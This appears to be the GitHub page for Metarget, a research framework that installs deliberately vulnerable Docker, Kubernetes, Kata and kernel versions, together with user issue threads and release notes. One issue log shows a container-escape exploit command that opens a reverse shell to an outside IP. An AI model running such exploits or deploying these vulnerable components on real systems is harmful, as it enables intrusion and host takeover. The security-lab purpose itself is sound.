framework providing automatic constructions of vulnerable infrastructures

Overview

metarget-logo

中文 | English

1 Introduction

Metarget = meta- + target, a framework providing automatic constructions of vulnerable infrastructures, used to deploy simple or complicated vulnerable cloud native targets swiftly and automatically.

1.1 Why Metarget?

During security researches, we might find that the deployment of vulnerable environment often takes much time, while the time spent on testing PoC or ExP is comparatively short. In the field of cloud native security, thanks to the complexity of cloud native systems, this issue is more terrible.

There are already some excellent security projects like Vulhub, VulApps in the open-source community, which pack vulnerable scenes into container images, so that researchers could utilize them and deploy scenes quickly.

However, these projects mainly focus on vulnerabilities in applications. What if we need to study the vulnerabilities in the infrastructures like Docker, Kubernetes and even Linux kernel?

Hence, we develop Metarget and hope to solve the deployment issue above to some extent. Furthermore, we also expect that Metarget could help to construct multilayer vulnerable cloud native scenes automatically.

1.2 Install Vulnerability!

In this project, we come up with concepts like installing vulnerabilities and installing vulnerable scenes. Why not install vulnerabilities just like installing softwares? We can do that, because our goals are security research and offensive security.

To be exact, we expect that:

  • metarget cnv install cve-2019-5736 will install Docker with CVE-2019-5736 onto the server.
  • metarget cnv install cve-2018-1002105 will install Kubernetes with CVE-2018-1002105 onto the server.
  • metarget cnv install kata-escape-2020 will install Kata-containers with CVE-2020-2023/2025/2026 onto the server.
  • metarget cnv install cve-2016-5195 will install a kernel with DirtyCoW into the server.

It's cool, right? No more steps. No RTFM. Execute one command and enjoy your coffee.

Furthermore, we expect that:

  • with Metarget's help, ethical hackers are able to deploy simple or complicated cloud native targets swiftly and learn by hacking cloud native environments.
  • metarget appv install dvwa will install a DVWA target onto our vulnerable infrastructure.
  • metarget appv install thinkphp-5-0-23-rce --external will install a ThinkPHP RCE vulnerability with NodePort service onto our vulnerable infrastructure.

You can just run 5 commands below after installing a new Ubuntu and obtain a multi-layer vulnerable scene:

./metarget cnv install cve-2016-5195 # container escape with dirtyCoW
./metarget cnv install cve-2019-5736 # container escape with docker
./metarget cnv install cve-2018-1002105 # kubernetes single-node cluster with cve-2018-1002105
./metarget cnv install privileged-container # deploy a privileged container
./metarget appv install dvwa --external # deploy dvwa target

RCE, container escape, lateral movement, persistence, they are yours now.

More awesome functions are coming! Stay tuned :)

Note:

Thie project aims to provide vulnerable scenes for security research. The security of scenes generated is not guaranteed. It is NOT recommended to deploy components or scenes with Metarget on the Internet.

2 Usage

2.1 Basic Usage

usage: metarget [-h] [-v] subcommand ...

automatic constructions of vulnerable infrastructures

positional arguments:
  subcommand     description
    gadget       cloud native gadgets (docker/k8s/...) management
    cnv          cloud native vulnerabilities management
    appv         application vulnerabilities management

optional arguments:
  -h, --help     show this help message and exit
  -v, --version  show program's version number and exit

Run ./metarget gadget list to see cloud native components supported currently.

2.2 Manage Cloud Native Components

usage: metarget gadget [-h] subcommand ...

positional arguments:
  subcommand  description
    list      list supported gadgets
    install   install gadgets
    remove    uninstall gadgets

optional arguments:
  -h, --help  show this help message and exit

2.2.1 Case: Install Docker with Specified Version

Run:

./metarget gadget install docker --version 18.03.1

If the command above completes successfully, 18.03.1 Docker will be installed.

2.2.2 Case: Install Kubernetes with Specified Version

Run:

./metarget gadget install k8s --version 1.16.5

If the command above completes successfully, 1.16.5 Kubernetes single-node cluster will be installed.

Note:

Usually, lots of options need to be configured in Kubernetes. As a security research project, Metarget provides some options for installation of Kubernetes:

  -v VERSION, --version VERSION
                        gadget version
  --cni-plugin CNI_PLUGIN
                        cni plugin, flannel by default
  --pod-network-cidr POD_NETWORK_CIDR
                        pod network cidr, default cidr for each plugin by
                        default
  --taint-master        taint master node or not

Metarget supports deployment of multi-node cluster. If you want to add more nodes into the cluster, you can copy tools/install_k8s_worker.sh script and run it on each worker nodes after the successful installation of single-node cluster.

2.2.3 Case: Install Kata-containers with Specified Version

Run:

./metarget gadget install kata --version 1.10.0

If the command above completes successfully, 1.10.0 Kata-containers will be installed.

Note:

You can also specify the type of kata runtime (qemu/clh/fc/...) with --kata-runtime-type option, which is qemu by default.

2.2.4 Case: Install Linux Kernel with Specified Version

Run:

./metarget gadget install kernel --version 5.7.5

If the command above completes successfully, 5.7.5 kernel will be installed.

Note:

Currently, Metarget install kernels in 2 ways:

  1. apt
  2. if apt package is not available, download *.deb remotely from Ubuntu and try to install

After successful installation of kernel, reboot of system is needed. Metarget will prompt to reboot automatically.

2.3 Manage Vulnerable Scenes Related to Cloud Native Components

usage: metarget cnv [-h] subcommand ...

positional arguments:
  subcommand  description
    list      list supported cloud native vulnerabilities
    install   install cloud native vulnerabilities
    remove    uninstall cloud native vulnerabilities

optional arguments:
  -h, --help  show this help message and exit

Run ./metarget cnv list to see vulnerable scenes related to cloud native components supported currently.

2.3.1 Case: CVE-2019-5736

Run:

./metarget cnv install cve-2019-5736

If the command above completes successfully, Docker with CVE-2019-5736 will be installed。

2.3.2 Case: CVE-2018-1002105

Run:

./metarget cnv install cve-2018-1002105

If the command above completes successfully, Kubernetes with CVE-2018-1002105 will be installed。

2.3.3 Case: Kata-containers Escape

Run:

./metarget cnv install kata-escape-2020

If the command above completes successfully, Kata-containers with CVE-2020-2023/2025/2026 will be installed。

2.3.4 Case: CVE-2016-5195

Run:

./metarget cnv install cve-2016-5195

If the command above completes successfully, kernel with CVE-2016-5195 will be installed。

2.4 Manage Vulnerable Scenes Related to Cloud Native Applications

usage: metarget appv [-h] subcommand ...

positional arguments:
  subcommand  description
    list      list supported application vulnerabilities
    install   install application vulnerabilities
    remove    uninstall application vulnerabilities

optional arguments:
  -h, --help  show this help message and exit

Run ./metarget appv list to see vulnerable scenes related to cloud native applications supported currently.

Note:

Before deploying application vulnerable scenes, you should install Docker and Kubernetes firstly. You can use Metarget to install Docker and Kubernetes.

2.4.1 Case: DVWA

Run:

./metarget appv install dvwa

If the command above completes successfully, DVWA will be deployed as Deployment and Service resources in current Kubernetes.

Note:

You can specify --external option, then the service will be exposed as NodePort, so that you can visit it by IP of the host node.

By default, the type of service is ClusterIP.

2.5 Manage Vulnerable Cloud Native Target Cluster

Developing, currently not supported.

3 Installation

3.1 Requirements

  • Ubuntu 16.04 or 18.04
  • Python >= 3.5
  • pip3

3.2 From Source

Clone the repository and install requirements:

git clone https://github.com/brant-ruan/metarget.git
cd metarget/
pip install -r requirements.txt

Begin to use Metarget and construct vulnerable scenes. For example:

./metarget cnv install cve-2019-5736

3.3 From PyPI

Currently unsupported.

4 Scene List

4.1 Vulnerable Scenes Related to Cloud Native Components

Name Class Type Status
cve-2018-15664 docker container_escape
cve-2019-13139 docker command_execution
cve-2019-14271 docker container_escape
cve-2020-15257 docker/containerd container_escape
cve-2019-5736 docker/runc container_escape
cve-2017-1002101 kubernetes container_escape
cve-2018-1002105 kubernetes privilege_escalation
cve-2019-11253 kubernetes denial_of_service
cve-2019-9512 kubernetes denial_of_service
cve-2019-9514 kubernetes denial_of_service
cve-2020-8554 kubernetes man_in_the_middle
cve-2020-8558 kubernetes exposure_of_service
cve-2016-5195 kernel container_escape
cve-2020-14386 kernel container_escape
cap_dac_read_search-container config container_escape
cap_sys_admin-container config container_escape
cap_sys_ptrace-container config container_escape
privileged-container config container_escape
mount-docker-sock mount container_escape
mount-host-etc mount container_escape
mount-host-procfs mount container_escape
kata-escape-2020 kata-containers container_escape

4.2 Vulnerable Scenes Related to Cloud Native Applications

These scenes are mainly derived from other open-source projects:

We express sincere gratitude to projects above!

Metarget converts scenes in projects above to Deployments and Services resources in Kubernetes (thanks to kompose).

To list vulnerable scenes related to cloud native applications supported by Metarget, just run:

./metarget appv list

5 DEMO

asciicast

6 Development Plan

  • deployments of basic cloud native components (docker, k8s)
  • integrations of vulnerable scenes related to cloud native components
  • integrations of RCE scenes in containers
  • automatic construction of multi-node cloud native target cluster
  • integrations of other cloud native vulnerable scenes (long term)

7 About Logo

It is not a Kubernetes, but a vulnerable infrastructure with three gears which could not work well (vulnerable) :)

Comments
  • meet some Error when install cve-2018-1002105

    meet some Error when install cve-2018-1002105

    when i use this command " ./metarget cnv install cve-2018-1002105 --domestic ",and the output get to " running kubeadm " ,I meet some Error. The Error is flowing: 捕获

    Really hope someone can help me ,thanks

    opened by painsAgains 4
  • 配置cve-2020-15257的小问题

    配置cve-2020-15257的小问题

    在Ubuntu18.04和16.04分别搭建过环境,最后结果都下面所示,Linux内核版本是5.8.0-59-generic

    sudo ./metarget cnv install cve-2020-15257 --verbose
    cve-2020-15257 is going to be installed
    uninstalling current docker gadgets if applicable
    Reading package lists... Done
    Building dependency tree       
    Reading state information... Done
    The following packages were automatically installed and are no longer required:
      aufs-tools cgroupfs-mount pigz
    Use 'sudo apt autoremove' to remove them.
    The following packages will be REMOVED:
      docker-ce
    0 upgraded, 0 newly installed, 1 to remove and 444 not upgraded.
    After this operation, 181 MB disk space will be freed.
    (Reading database ... 133309 files and directories currently installed.)
    Removing docker-ce (18.03.1~ce~3-0~ubuntu) ...
    Processing triggers for man-db (2.8.3-2ubuntu0.1) ...
    Reading package lists... Done
    Building dependency tree       
    Reading state information... Done
    Package 'docker' is not installed, so not removed
    The following packages were automatically installed and are no longer required:
      aufs-tools cgroupfs-mount pigz
    Use 'sudo apt autoremove' to remove them.
    0 upgraded, 0 newly installed, 0 to remove and 444 not upgraded.
    Reading package lists... Done
    Building dependency tree       
    Reading state information... Done
    Package 'docker-engine' is not installed, so not removed
    The following packages were automatically installed and are no longer required:
      aufs-tools cgroupfs-mount pigz
    Use 'sudo apt autoremove' to remove them.
    0 upgraded, 0 newly installed, 0 to remove and 444 not upgraded.
    Reading package lists... Done
    Building dependency tree       
    Reading state information... Done
    Package 'docker.io' is not installed, so not removed
    The following packages were automatically installed and are no longer required:
      aufs-tools cgroupfs-mount pigz
    Use 'sudo apt autoremove' to remove them.
    0 upgraded, 0 newly installed, 0 to remove and 444 not upgraded.
    Reading package lists... Done
    Building dependency tree       
    Reading state information... Done
    Package 'containerd' is not installed, so not removed
    The following packages were automatically installed and are no longer required:
      aufs-tools cgroupfs-mount pigz
    Use 'sudo apt autoremove' to remove them.
    0 upgraded, 0 newly installed, 0 to remove and 444 not upgraded.
    Reading package lists... Done
    Building dependency tree       
    Reading state information... Done
    Package 'runc' is not installed, so not removed
    The following packages were automatically installed and are no longer required:
      aufs-tools cgroupfs-mount pigz
    Use 'sudo apt autoremove' to remove them.
    0 upgraded, 0 newly installed, 0 to remove and 444 not upgraded.
    installing prerequisites
    Hit:1 https://mirrors.tuna.tsinghua.edu.cn/ubuntu bionic InRelease
    Hit:2 https://mirrors.tuna.tsinghua.edu.cn/ubuntu bionic-updates InRelease          
    Hit:3 https://mirrors.tuna.tsinghua.edu.cn/ubuntu bionic-backports InRelease                                  
    Hit:4 https://mirrors.tuna.tsinghua.edu.cn/ubuntu bionic-security InRelease                                   
    Hit:5 http://archive.ubuntu.com/ubuntu xenial-updates InRelease                                               
    Hit:6 http://archive.ubuntu.com/ubuntu bionic-updates InRelease
    Hit:7 https://download.docker.com/linux/ubuntu bionic InRelease
    Reading package lists... Done         
    Reading package lists... Done
    Building dependency tree       
    Reading state information... Done
    ca-certificates is already the newest version (20210119~18.04.1).
    software-properties-common is already the newest version (0.96.24.32.14).
    apt-transport-https is already the newest version (1.6.13).
    gnupg-agent is already the newest version (2.2.4-1ubuntu1.4).
    The following packages were automatically installed and are no longer required:
      aufs-tools cgroupfs-mount pigz
    Use 'sudo apt autoremove' to remove them.
    0 upgraded, 0 newly installed, 0 to remove and 444 not upgraded.
    adding apt repository deb [arch=amd64] https://download.docker.com/linux/ubuntu bionic stable
    OK
    Hit:1 https://mirrors.tuna.tsinghua.edu.cn/ubuntu bionic InRelease
    Hit:2 https://mirrors.tuna.tsinghua.edu.cn/ubuntu bionic-updates InRelease                                                                                     
    Hit:3 https://mirrors.tuna.tsinghua.edu.cn/ubuntu bionic-backports InRelease                                                                                   
    Hit:4 https://mirrors.tuna.tsinghua.edu.cn/ubuntu bionic-security InRelease                                                                                                              
    Hit:5 https://download.docker.com/linux/ubuntu bionic InRelease                                                                                                                          
    Hit:6 http://archive.ubuntu.com/ubuntu xenial-updates InRelease
    Hit:7 http://archive.ubuntu.com/ubuntu bionic-updates InRelease
    Reading package lists... Done
    adding apt repository deb http://archive.ubuntu.com/ubuntu xenial-updates universe
    Hit:1 https://mirrors.tuna.tsinghua.edu.cn/ubuntu bionic InRelease
    Hit:2 https://mirrors.tuna.tsinghua.edu.cn/ubuntu bionic-updates InRelease                                                               
    Hit:3 https://mirrors.tuna.tsinghua.edu.cn/ubuntu bionic-backports InRelease                                                             
    Hit:4 https://mirrors.tuna.tsinghua.edu.cn/ubuntu bionic-security InRelease                                                                                                              
    Hit:5 https://download.docker.com/linux/ubuntu bionic InRelease                                                                                                                          
    Hit:6 http://archive.ubuntu.com/ubuntu xenial-updates InRelease
    Hit:7 http://archive.ubuntu.com/ubuntu bionic-updates InRelease
    Reading package lists... Done
    adding apt repository deb http://archive.ubuntu.com/ubuntu bionic-updates universe
    Hit:1 https://mirrors.tuna.tsinghua.edu.cn/ubuntu bionic InRelease
    Hit:2 https://mirrors.tuna.tsinghua.edu.cn/ubuntu bionic-updates InRelease                                                                                     
    Hit:3 https://mirrors.tuna.tsinghua.edu.cn/ubuntu bionic-backports InRelease                                                                                                             
    Hit:4 https://mirrors.tuna.tsinghua.edu.cn/ubuntu bionic-security InRelease                                                                                                              
    Hit:5 https://download.docker.com/linux/ubuntu bionic InRelease                                                                                                                          
    Hit:6 http://archive.ubuntu.com/ubuntu xenial-updates InRelease
    Hit:7 http://archive.ubuntu.com/ubuntu bionic-updates InRelease
    Reading package lists... Done
    Hit:1 https://mirrors.tuna.tsinghua.edu.cn/ubuntu bionic InRelease
    Hit:2 https://mirrors.tuna.tsinghua.edu.cn/ubuntu bionic-updates InRelease                                                                                                               
    Hit:3 https://mirrors.tuna.tsinghua.edu.cn/ubuntu bionic-backports InRelease                                                                                                             
    Hit:4 https://mirrors.tuna.tsinghua.edu.cn/ubuntu bionic-security InRelease                                                                                                              
    Hit:5 https://download.docker.com/linux/ubuntu bionic InRelease                                                                                                                          
    Hit:6 http://archive.ubuntu.com/ubuntu xenial-updates InRelease
    Hit:7 http://archive.ubuntu.com/ubuntu bionic-updates InRelease
    Reading package lists... Done
    installing docker-ce with 18.03.1~ce~3-0~ubuntu version
    Reading package lists... Done
    Building dependency tree       
    Reading state information... Done
    The following NEW packages will be installed:
      docker-ce
    0 upgraded, 1 newly installed, 0 to remove and 444 not upgraded.
    Need to get 0 B/33.9 MB of archives.
    After this operation, 181 MB of additional disk space will be used.
    Selecting previously unselected package docker-ce.
    (Reading database ... 133095 files and directories currently installed.)
    Preparing to unpack .../docker-ce_18.03.1~ce~3-0~ubuntu_amd64.deb ...
    Unpacking docker-ce (18.03.1~ce~3-0~ubuntu) ...
    Setting up docker-ce (18.03.1~ce~3-0~ubuntu) ...
    Processing triggers for ureadahead (0.100.0-21) ...
    Processing triggers for systemd (237-3ubuntu10.24) ...
    Processing triggers for man-db (2.8.3-2ubuntu0.1) ...
    warning: no candidate version for containerd
    warning: docker seems to be installed, but some errors happened during installation
    cve-2020-15257 successfully installed
    

    安装成功,但是显示有warning

    然后按照Writeup的方式去复现,可以找到抽象命名空间的套接字。但是在进行exploit时发现结果如下所示:

    root@ubuntu:/tmp# run shim-pwn reverse xx.xx.xx.xx 1234
    bash: run: command not found
    root@ubuntu:/tmp# ./cdk_linux_amd64 run shim-pwn reverse xx.xx.xx.xx 1234
    2021/06/28 07:55:31 tring to spawn shell to 49.232.1.8:1234
    2021/06/28 07:55:31 try socket: @/containerd-shim/moby/b2d38375588b3b988f9010ce551d785a2bdb37a497aed068c8482b0776af2910/shim.sock
    2021/06/28 07:55:31 rpc error response.:
    rpc error: code = Unknown desc = OCI runtime create failed: exec: "runc": executable file not found in $PATH
    2021/06/28 07:55:31 exploit failed.
    

    报错信息显示runc不在PATH路径下,执行runc提示需要安装。发现实际上安装的runc可执行文件为docker-runc,创建软链接后利用成功。

    似乎如果系统安装过docker,再利用metarget安装漏洞环境就会导致runc的名称问题。不知道这属不属于bug,或许在writeup上可以做下标注?

    bug 
    opened by duowen1 3
  • CVE-2022-0492 cannot deploy, ubuntu kernel 5.8 has been patehed

    CVE-2022-0492 cannot deploy, ubuntu kernel 5.8 has been patehed

    opened by awslshadowstar 2
  • ./metarget cnv list的时候报错,求解

    ./metarget cnv list的时候报错,求解

    Traceback (most recent call last): File "./metarget", line 250, in main() File "./metarget", line 243, in main args.func(args) File "/home/vivoadmin/metarget-master/cmds/cnv.py", line 254, in retrieve vulns = vuln_loader.load_vulns_by_dir(config.vuln_cn_dir_wildcard) File "/home/vivoadmin/metarget-master/core/vuln_cn_manager/vuln_loader.py", line 48, in load_vulns_by_dir return load_vulns(vuln_files) File "/home/vivoadmin/metarget-master/core/vuln_cn_manager/vuln_loader.py", line 39, in load_vulns vuln = load_vuln(f) File "/home/vivoadmin/metarget-master/core/vuln_cn_manager/vuln_loader.py", line 26, in load_vuln vuln = yaml.load(f, Loader=yaml.SafeLoader) File "/usr/lib/python3/dist-packages/yaml/init.py", line 70, in load loader = Loader(stream) File "/usr/lib/python3/dist-packages/yaml/loader.py", line 24, in init Reader.init(self, stream) File "/usr/lib/python3/dist-packages/yaml/reader.py", line 85, in init self.determine_encoding() File "/usr/lib/python3/dist-packages/yaml/reader.py", line 135, in determine_encoding self.update(1) File "/usr/lib/python3/dist-packages/yaml/reader.py", line 169, in update self.check_printable(data) File "/usr/lib/python3/dist-packages/yaml/reader.py", line 144, in check_printable 'unicode', "special characters are not allowed") yaml.reader.ReaderError: unacceptable character #x0088: special characters are not allowed in "vulns_cn/kernel/cve-2022-0185.yaml", position 304 有人遇到过这个吗? 不知道怎么解决欸

    opened by fog895559 2
  • 增加了一个简化版的readme文件

    增加了一个简化版的readme文件

    感谢指出问题,做个简要回答:

    1. 在本地运行exp后执行ps -aux没有任何异常,可以看到host上所有进程。不知道shell崩溃退出的原因是否是因为没有挂载/proc伪文件系统;
    2. 我自己也感受到了writeup的冗长和杂乱无章,这个writeup主要是我自己在复现的时候做的笔记,当时是希望将每个点都讲清楚。对于内核的漏洞来讲,涉及到的知识面非常多,而且要求研究者对内核很多机制有较深的理解,我主要翻译了国外大神的分析,结合了我对内核、容器的思考。但是囿于自己的表达能力,整体的逻辑可能比较欠缺。但同时如果做到逻辑完整,那么篇幅就会很长。

    重新写了一版的writeup,标题层次如下,并且大量删除了大量内容。

    Linux内核漏洞导致容器逃逸(CVE-2017-7308)
        场景介绍
        背景知识
        漏洞详情
            漏洞分析
            漏洞利用
        环境搭建
        漏洞复现
        参考文献
    
    opened by duowen1 2
  • Install cve-2017-7308,error: kernel package list not found.

    Install cve-2017-7308,error: kernel package list not found.

    Hey, it's me again. I was installing cve-2017-7308. I firstly ran git pull to get my metarget update to your registry. And I ran ./metarget cnv install cve-2017-7308, then the output is:

    cve-2017-7308 is going to be installed
    switching kernel by version
    adding apt repository deb http://security.ubuntu.com/ubuntu trusty-security main
    adding apt repository deb http://security.ubuntu.com/ubuntu xenial-security main
    adding apt repository deb http://security.ubuntu.com/ubuntu bionic-security main
    warning: no apt package for kernel 4.8.0-34
    switching kernel version with downloading packages
    retrieving package list for kernel 4.8.0-34
    error: kernel package list not found
    error: failed to install cve-2017-7308
    

    My kernel version is 5.0.0-23-generic, and my operating system is Ubuntu 18.04.

    opened by duowen1 2
  • 下载内核漏洞cve-2020-14386 显示/tmp是一个文件夹

    下载内核漏洞cve-2020-14386 显示/tmp是一个文件夹

    执行命令sudo ./metarget cnv install cve-2020-14386,python异常输出如下:

    Traceback (most recent call last):
      File "./metarget", line 231, in <module>
        main()
      File "./metarget", line 224, in main
        args.func(args)
      File "/home/user/Desktop/metarget/cmds/cnv.py", line 136, in install
        gadgets=vuln['dependencies'], verbose=args.verbose):
      File "/home/user/Desktop/metarget/core/env_managers/kernel_installer.py", line 54, in install_by_version
        version, verbose=verbose)
      File "/home/user/Desktop/metarget/core/env_managers/kernel_installer.py", line 86, in _install_by_version_with_download
        cls.download_file(deb, config.kernel_packages_dir)
      File "/home/user/Desktop/metarget/core/env_managers/installer.py", line 300, in download_file
        with open(dst, 'wb') as f:
    IsADirectoryError: [Errno 21] Is a directory: '/tmp'
    

    原因是字符串dst此时为'/tmp',是一个目录。修改metarget/core/env_managers/installer.py第299行:

    原代码

    dst=save_path
    

    修改后

    dst=save_path+'/'+url.split('/')[-1]
    
    bug 
    opened by duowen1 1
  • Project dependencies may have API risk issues

    Project dependencies may have API risk issues

    Hi, In metarget, inappropriate dependency versioning constraints can cause risks.

    Below are the dependencies and version constraints that the project is using

    PyYaml
    docker==5.0.0
    packaging
    requests
    beautifulsoup4
    tqdm
    prettytable==1.0.1
    

    The version constraint == will introduce the risk of dependency conflicts because the scope of dependencies is too strict. The version constraint No Upper Bound and * will introduce the risk of the missing API Error because the latest version of the dependencies may remove some APIs.

    After further analysis, in this project, The version constraint of dependency packaging can be changed to >=14.1,<=21.3. The version constraint of dependency requests can be changed to >=0.2.1,<=0.2.3. The version constraint of dependency requests can be changed to >=0.7.0,<=2.24.0. The version constraint of dependency requests can be changed to ==2.26.0. The version constraint of dependency beautifulsoup4 can be changed to >=4.10.0,<=4.11.1. The version constraint of dependency tqdm can be changed to >=4.36.0,<=4.64.0. The version constraint of dependency prettytable can be changed to >=0.6,<=1.0.1.

    The above modification suggestions can reduce the dependency conflicts as much as possible, and introduce the latest version as much as possible without calling Error in the projects.

    The invocation of the current project includes all the following methods.

    The calling methods from the packaging
    packaging.version.parse
    
    The calling methods from the requests
    requests.get
    
    The calling methods from the beautifulsoup4
    bs4.BeautifulSoup
    
    The calling methods from the tqdm
    tqdm.tqdm
    
    The calling methods from the prettytable
    prettytable.PrettyTable
    prettytable.PrettyTable.add_row
    prettytable.PrettyTable.get_string
    
    The calling methods from the all methods
    core.env_managers.cni_plugin_installer.CNIPluginInstaller.install_cni_plugin
    utils.checkers.docker_specified_installed
    cls._get_kubeadm_token_and_hash
    vuln.get
    version.rstrip.endswith
    cls._act
    flask.redirect
    dict.keys
    fw.write
    version_string.re.search.group.startswith
    int
    flask.render_template_string
    res.stdout.decode.split.pop
    flask.Flask.route
    res.stdout.decode
    core.env_managers.docker_installer.DockerInstaller.uninstall
    os.path.join
    CNIPluginInstaller._install_flannel
    pathlib.Path.unlink
    flask.Flask.run
    print
    utils.checkers.kata_specified_installed
    filename.re.search.group
    re.search
    core.env_managers.kubernetes_installer.KubernetesInstaller.uninstall
    cls._pull_image
    utils.filters.filter_vuln_by_name.startswith
    subprocess.run
    res.stdout.decode.split
    yaml.load.keys
    PIL.Image.open
    pathlib.Path.exists
    package_name.lstrip
    debug_input
    re.sub
    tr.a.get_text.startswith
    deb.split
    DockerInstaller.install_by_version
    cls._pre_configure
    cls._pre_install
    open
    res.headers.get
    os.chown
    cls._get_k8s_images_list
    XXXInstaller.install_by_version
    load_vulns
    utils.filters.filter_vuln_by_name
    sys.exit
    operator.itemgetter
    core.vuln_app_manager.resource_modifier.generate_deployments_with_modifications
    cls.reload_and_restart_docker
    cmds.internal.deploy_vuln_resources_in_k8s
    filename.rsplit.lower
    fr.read
    KubernetesInstaller.uninstall
    werkzeug.utils.secure_filename.rsplit
    debug
    mappings.items
    core.env_managers.kubernetes_resource_deployer.KubernetesResourceDeployer.delete
    version.rstrip.rstrip
    temp_yaml.endswith
    docker_installed
    filter_name_by_regex
    cls._install_with_context
    cls.docker_client.images.get
    yaml.endswith
    context.get
    utils.system.reboot_system
    cls._pull_domestic_image
    dict
    os.readlink.split
    entry.split.strip.sort
    utils.color_print.debug_input
    core.vuln_app_manager.port_manager.allocate_ports
    obj_list.keys
    input
    yaml.dump
    os.environ.get
    KernelInstaller.install_by_version
    core.env_managers.package_list_downloader.download_package_list
    core.vuln_app_manager.vuln_loader.load_vulns_by_dir
    str
    utils.system.mkdir_if_not_exist
    res.stdout.decode.split.startswith
    version_table.find_all
    core.env_managers.kata_containers_installer.KataContainersInstaller.uninstall
    DockerInstaller.uninstall
    utils.checkers.docker_kubernetes_installed
    os.path.join.extend
    show_table
    bs4.BeautifulSoup
    cls.docker_client.images.get.replace
    cls._run_kubeadm
    string.Template
    pathlib.Path.mkdir
    cls._modify_grub
    cls.get_host_ip
    glob.glob
    cls._pull_images
    docker.from_env
    len
    core.env_managers.kubernetes_installer.KubernetesInstaller.install_by_version
    tqdm.tqdm
    utils.checkers.containerd_specified_installed
    core.env_managers.kernel_installer.KernelInstaller.install_by_version
    utils.system.reload_daemon_config
    services_using_ports.index
    CNIPluginInstaller._install_calico
    pathlib.Path
    cls._pull_docker_image
    KubernetesInstaller.install_by_version
    load_vulns_by_dir
    cls._get_kubernetes_cni_version
    shutil.rmtree
    cls._install_one_gadget_by_version
    encode
    re.match
    collections.OrderedDict
    yaml_path.split
    split.append
    _get_next_available_port
    requests.get
    copy.copy
    KataContainersInstaller.install_by_version
    copy.copy.append
    utils.checkers.kernel_specified_installed
    cls._install_by_version_with_apt
    allowed_file
    version_string.re.search.group
    core.vuln_app_manager.resource_modifier.generate_svcs_with_clusterip_to_nodeport
    core.vuln_cn_manager.vuln_loader.load_vulns_by_dir
    XXXInstaller.uninstall
    string.Template.safe_substitute
    entry.get_text
    PIL.Image.open.load
    new_name.split
    f.write
    utils.color_print.warning
    link_target.split.split
    list.append
    utils.color_print.debug
    utils.checkers.gadget_in_gadgets
    cls._pull_k8s_images
    pathlib.Path.symlink_to
    os.getcwd
    ports_usage.append
    werkzeug.utils.secure_filename
    format.split
    flask.Flask
    k8s_version.re.search.group
    cls._image_exist
    prettytable.PrettyTable
    server_string.re.search.group
    flask.flash
    cmds.internal.delete_vuln_resources_in_k8s
    cls._pull_quay_image
    config.k8s_hash_generator.format.split
    entry.startswith
    cls._get_apt_complete_package
    yaml.load
    prettytable.PrettyTable.add_row
    pathlib.Path.touch
    utils.color_print.error_and_exit
    cls._apt_update
    socket.socket.close
    socket.socket.connect
    core.env_managers.kata_containers_installer.KataContainersInstaller.install_by_version
    depends.split
    core.env_managers.docker_installer.DockerInstaller.install_by_version
    cls._get_apt_complete_version
    cls.download_file
    tr.a.get_text
    cls._is_version_available_in_apt
    requests.get.iter_content
    cls._get_k8s_images_list_by_version
    cls._update_k8s_worker_script
    utils.checkers.kubernetes_specified_installed
    core.vuln_app_manager.port_manager.release_ports
    load_vuln
    shutil.copy
    utils.checkers.docker_installed
    kubernetes_installed
    depend.split.split
    os.getuid
    dict.pop
    depend.split
    platform.dist
    res.re.search.group
    cls._fetch_package_list_by_version
    services_using_ports.pop
    depend.split.split.split
    nl_print
    cls._tag_image
    utils.color_print.error
    json.loads
    list
    repo_entry.format.split
    release_ports
    ports_usage.pop
    cls.docker_client.images.get.tag
    core.env_managers.kubernetes_resource_deployer.KubernetesResourceDeployer.apply
    prettytable.PrettyTable.get_string
    socket.socket.getsockname
    format
    f.read
    os.readlink
    mappings.pop
    open.close
    join
    image_file.save
    obj.values
    utils.table.show_table
    json.dumps
    utils.verbose.verbose_output
    cls._pull_domestic_images
    cls._add_apt_repository
    bs4.BeautifulSoup.find_all
    CNIPluginInstaller._install_cilium
    cls.docker_client.images.remove
    os.path.split
    packaging.version.parse
    v.startswith
    config.kata_tar_decompress_dest.format.split
    gpg_url.format.split
    cls._install_cni_plugin
    cls._configure_docker_with_kata
    action.format.split
    set
    download_package_list
    cls._create_k8s_resources
    cls._install_by_version_with_download
    socket.socket
    split
    zip
    image.format.split
    get_img_size
    allocate_ports
    cls._config_auth
    os.getgid
    entry.split
    f.read.strip
    entry.split.strip
    os.mkdir
    grub_option.format.split
    utils.system.create_file_if_not_exist
    action.strip
    ports_used_list.append
    res.stdout.decode.strip
    _get_gadget_version_from_gadgets
    KataContainersInstaller.uninstall
    

    @developer Could please help me check this issue? May I pull a request to fix it? Thank you very much.

    opened by PyDeps 0
  • 默认设置的特性门控不适用部分版本的k8s

    默认设置的特性门控不适用部分版本的k8s

    你好,我在使用./metarget cnv install cve-2019-1002101 --verbose --domestic命令安装cve-2019-1002101漏洞场景时,安装后k8s没有成功启动,出现了下图报错,经过排查发现kubelet配置文件中设置了特性门控:--feature-gates SupportNodePidsLimit=false image

    这个漏洞环境安装的k8s版本为1.11.1,而这个设置适用开始于1.14版本,低版本下没有办法设置,导致kubelet服务暂停 参考链接:https://kubernetes.io/zh/docs/reference/command-line-tools-reference/feature-gates/#using-a-feature 删除这个配置后,重启kubelet,服务正常。

    bug 
    opened by t1Kun 0
  • 安装低版本docker依赖问题

    安装低版本docker依赖问题

    你好,我在使用./metarget gadget install docker --version 17.01 --verbose 命令安装17.01版本的docker时,提示安装成功,实际上并没有安装,后来发现是工具添加的docker依赖里面没有低版本的安装包,需要手动添加deb [arch=amd64] https://download.docker.com/linux/ubuntu xenial stable 然后更新才可以手动安装18以下版本的docker环境

    这种情况出现在漏洞环境需要18以下的docker版本

    bug 
    opened by t1Kun 0
Releases(v0.9.1)
  • v0.9.1(Dec 31, 2021)

    In May 2020, Metarget was open-sourced and has been used by many cloud native security researchers since then. We also obtained lots of contributions from the community. Thank you!

    • adopt semantic versioning
    • some cnvs and appvs added
    • ...

    Stay tuned :)

    Source code(tar.gz)
    Source code(zip)
  • v0.5(Jun 3, 2021)

  • v0.4(May 19, 2021)

    • some bugs fixed; thanks to @duowen1 and @Kfzz1
    • now we start up to implement metarget target!
    • stay tuned for further updates and releases :)
    Source code(tar.gz)
    Source code(zip)
  • v0.3(May 7, 2021)

  • v0.2(Apr 28, 2021)

  • v0.1(Apr 25, 2021)

Owner
rambolized
IT Security Researcher
rambolized
DataOps framework for Machine Learning projects.

Noronha DataOps Noronha is a Python framework designed to help you orchestrate and manage ML projects life-cycle. It hosts Machine Learning models ins

null 52 Oct 30, 2022
